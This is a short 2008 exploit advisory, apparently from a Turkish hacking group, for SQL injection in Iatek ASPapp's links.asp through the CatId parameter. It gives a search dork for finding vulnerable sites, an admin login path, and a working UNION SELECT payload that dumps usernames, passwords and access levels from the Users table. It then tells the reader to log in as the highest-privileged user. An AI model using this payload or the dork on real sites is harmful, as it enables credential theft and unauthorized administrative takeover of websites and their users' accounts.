aspapp-sql.txt

2008-03-19T00:00:00
ID PACKETSTORM:64723
Type packetstorm
Reporter xcorpitx
Modified 2008-03-19T00:00:00

Description

                                        
                                            `..##.....##   
...##...##   
....##.##  
.....###CoRPITX   
.....###   
....##.##  
...##...##  
..##.....##  
  
-----------------Turkey--------------------------------------  
  
--------- www.Hayalet-hack.com-------------------------------  
  
----------www.xcorpitx-hack.com------------------------------  
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability   
-------------------------------------------------  
you ll see lots of users like this but accesslevel ll help you for see admin  
-------------------------------------------------------------  
----------------example--------------------------------------  
  
Links › guest › 12 › 1 user  
Links › editor › editor › 2 materator  
Links › manager› manager› 2 materator  
Links › surco › surco › 2 materator  
Links › admin › admin › 3 admin  
Links › ovivas › ovivas › 4 super-admin----- we ll login with this username  
-------------------------------------------------------------  
  
-------------------------------------------------------------  
i mean.. when you see big number 4 or 5 you can use this username and password  
-------------------------------------------------------------  
  
-------  
dork - ''links.asp?CatId''  
-------  
exploit-  
-------  
admin login-   
-------  
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F  
-------  
-------------------------------------------------------------  
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users  
-------------------------------------------------------------  
  
thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-  
  
  
  
`